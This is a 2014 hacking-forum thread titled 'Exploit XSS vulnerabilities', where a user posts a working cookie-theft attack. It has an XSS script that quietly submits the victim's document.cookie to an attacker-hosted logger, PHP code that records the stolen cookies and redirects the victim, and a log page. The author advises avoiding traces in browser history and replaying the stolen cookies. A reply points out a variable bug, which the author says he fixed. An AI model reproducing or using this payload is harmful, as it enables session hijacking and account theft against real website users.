Exploit XSS vulnerabilities

Programming HOW TOs and in-depth guides for programmers of all levels. Programming is an essential skill for hackers, so start learning today!

Exploit XSS vulnerabilities

Postby Hatemind » Fri Jun 06, 2014 10:03 pm

This may be well known, but I'm going to show you how to actually steal cookies once you have found an XSS. It submits a hidden form to a PHP file you host. It could redirect to a URL with GET, but then it's more obvious that cookies where stolen by the URL if the victim checks browsing history. You could also use the javascript form submission, but I used a fake click instead.

XSS CODE:
Code: Select all
<script>document.write('<form method=post action="http://example.com/logger.php" style="display:none;"><textarea name=data>', document.cookie, '</textarea><input type=submit id="submit"/></form>');document.getElementById('submit').click();</script>
PHP CODE:
Code: Select all
<?PHP if (isset($_REQUEST['data'])) { $data = $_REQUEST['data']; $url = "http://www.google.com/"; //URL to redirect to after stealing shit. $log = fopen("xsslog.html", "a+"); fwrite($log, $data."<br>\r\n<br>\r\n"); fclose($log); header("Location: ".$url); } ?>
HTML CODE: (optional but sexy)
Code: Select all
<style>* {background: #080808; color: #009900; font-family: "Courier New", Courier, "Lucida Sans Typewriter", "Lucida Typewriter", monospace;}</style> <h1>XSS C00KIE L0GS</h1>
You can't be a hacker without green text on a black screen and numbers in place of letters.

In order to use stolen cookies, you'll need to find a browser extension that lets you do so.
Last edited by Hatemind on Sat Jun 14, 2014 3:43 am, edited 1 time in total.
Hatemind
n00b
 
Posts: 5
Joined: Fri May 30, 2014 1:14 pm

Re: Exploit XSS vulnerabilities

Postby Cool_Fire » Mon Jun 09, 2014 2:12 pm

Minor bug in your php:
You're writing $data but you never copy $_REQUEST['data'] into $data.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.
User avatar
Cool_Fire
Not a sandwich
 
Posts: 1880
Joined: Fri May 09, 2003 1:20 pm
ICQ: 336613081
Website: https://www.insomnia247.nl/
Yahoo Messenger: cool_fire_666
AOL: EvilCoolFire
Location: 41 6d 73 74 65 72 64 61 6d

Re: Exploit XSS vulnerabilities

Postby Hatemind » Sat Jun 14, 2014 3:43 am

Minor bug in your php:
You're writing $data but you never copy $_REQUEST['data'] into $data.
No idea how I missed that, but I fixed it.
Hatemind
n00b
 
Posts: 5
Joined: Fri May 30, 2014 1:14 pm


Return to ā€œ%sā€ Programming / Scripting Tutorials

Who is online

Users browsing this forum: No registered users and 0 guests

cron